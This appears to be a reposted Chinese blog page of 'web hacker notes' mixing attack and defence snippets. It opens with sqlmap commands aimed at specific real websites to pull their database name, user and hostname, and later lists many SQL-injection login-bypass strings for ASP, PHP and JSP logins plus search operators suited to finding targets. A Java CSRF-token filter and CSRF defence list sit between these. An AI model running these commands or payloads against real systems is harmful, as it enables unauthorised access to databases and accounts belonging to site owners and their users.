web hacker笔记

sqlmap.py -u "http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911" --threads 10 --level 3 -p myparams --dbms "MySQL" --current-db --current-user --hostname

sqlmap -u "http://www.1think.com.cn/Search.php?SearchKeyWords=HAHA" --threads 15 --level 3  --dbms "Microsoft SQL Server" --os "Windows" --current-db --current-user --hostname

BSoD,Blue Screen of Death,即蓝屏死机。
微软操作系统的经典死机提示屏幕。通常是由于工作在Ring0级的内核程序出错导致的,比如内核程序访问了不可访问的内存会立即导致BSoD。


Proof of Conc Proof of Conceptept简称PoC,
中文翻译为概念证明,是证实发布的漏洞真实性的测试代码,一般可以理解为和漏洞利用工具差不多的意思。


filter 中验证请求中的 token

HttpServletRequest req = (HttpServletRequest)request;
 HttpSession s = req.getSession();
 // 从 session 中得到 csrftoken 属性
 String sToken = (String)s.getAttribute(“csrftoken”);
 if(sToken == null){
    // 产生新的 token 放入 session 中
    sToken = generateToken();
    s.setAttribute(“csrftoken”,sToken);
    chain.doFilter(request, response);
 } else{
    // 从 HTTP 头中取得 csrftoken
    String xhrToken = req.getHeader(“csrftoken”);
    // 从请求参数中取得 csrftoken
    String pToken = req.getParameter(“csrftoken”);
    if(sToken != null && xhrToken != null && sToken.equals(xhrToken)){
        chain.doFilter(request, response);
    }else if(sToken != null && pToken != null && sToken.equals(pToken)){
        chain.doFilter(request, response);
    }else{
request.getRequestDispatcher(“error.jsp”).forward(request,response);
    }
 } 

跨站请求伪造CSRF漏洞防御
CSRF漏洞防御主要可以从三个层面进行,即服务端的防御、用户端的防御和安全设备的防御。
1、 服务端的防御
1.1 验证HTTP Referer字段
1.2 在请求地址中添加token并验证
1.3 在HTTP头中自定义属性并验证

2、其他防御方法

  1. CSRF攻击是有条件的,当用户访问恶意链接时,认证的cookie仍然有效,所以当用户关闭页面时要及时清除认证cookie,对支持TAB模式(新标签打开网页)的浏览器尤为重要。
  2. 尽量少用或不要用request()类变量,获取参数指定request.form()还是request. querystring (),这样有利于阻止CSRF漏洞攻击,此方法只不能完全防御CSRF攻击,只是一定程度上增加了攻击的难度。

asp aspx万能密码

   1: "or "a"="a
   2: ')or('a'='a
   3:or 1=1--
   4:'or 1=1--
   5:a'or' 1=1--
   6: "or 1=1--
   7:'or'a'='a
   8: "or"="a'='a
   9:'or''='
   10:'or'='or'
   11: 1 or '1'='1'=1
   12: 1 or '1'='1' or 1=1
   13: 'OR 1=1%00
   14: "or 1=1%00
   15: 'xor
   16: 新型万能登陆密码
   用户名 `' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)`
   密码 1
   
   Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
   Password=1

   17.`admin' or 'a'='a` 密码随便

PHP万能密码

   'or'='or'
  
   'or 1=1/*  字符型 GPC是否开都可以使用

   User: something
   Pass: ' OR '1'='1

jsp 万能密码

   1' or '1'='1

   admin' OR 1=1/*
 
   用户名:admin    系统存在这个用户的时候 才用得上
   密码:1' or '1'='1


搜索命令

  • intitle: 限制搜索的词语是网页标题中包含的关键词 intitle:keyword
  • inurl: 限制搜索的网页的地址 inurl:keyword
  • filetype: 限制所搜索的文件一个特定的格式 filetype:extension
  • site: 限制所进行的搜索在指定的域名或网站内 site:domain
  • intext: 限制搜索的词语是网页内文包含的关键词 intext:keyword

猜你喜欢

转载自blog.csdn.net/WuLex/article/details/83317395
今日推荐